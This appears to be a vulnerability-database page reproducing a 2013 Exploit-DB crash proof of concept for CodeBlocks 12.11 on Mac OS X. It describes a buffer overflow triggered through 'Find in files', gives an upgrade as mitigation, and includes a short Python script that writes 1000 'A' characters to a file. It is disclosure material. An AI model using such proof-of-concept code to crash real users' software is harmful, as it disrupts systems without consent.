CodeBlocks 12.11 (Mac OS X) Crash POC

vendor:

CodeBlocks

by:

ariarat

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: CodeBlocks

Affected Version From: 12.11

Affected Version To: 12.11

Patch Exists: YES

Related CWE: N/A

CPE: a:codeblocks:codeblocks

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mac OS X 10.7.5

2013

CodeBlocks 12.11 (Mac OS X) Crash POC

CodeBlocks 12.11 is vulnerable to a buffer overflow when a user searches for a specific character in the 'Find in files' section. The user must leave the 'Search path' section blank and type any character in the 'Text to search for' section. This will cause a crash due to a stack-based buffer overflow.

Mitigation:

Upgrade to the latest version of CodeBlocks

Source

Exploit-DB raw data:

# Exploit Title: CodeBlocks 12.11 (Mac OS X) Crash POC
# Date: 27-05-2013
# Exploit Author: ariarat 
# Vendor Homepage: http://www.codeblocks.org
# Software Link: http://sourceforge.net/projects/codeblocks/files/Binaries/12.11/MacOS/codeblocks-12.11-mac.dmg
# Version: 12.11 
# Tested on: [ Mac OS X 10.7.5]
#============================================================================================
# in Search -> Find in files... -> Text to search for: type any character!
# *** path in [Search path] section must be blank ***
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================



#!/usr/bin/python

filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()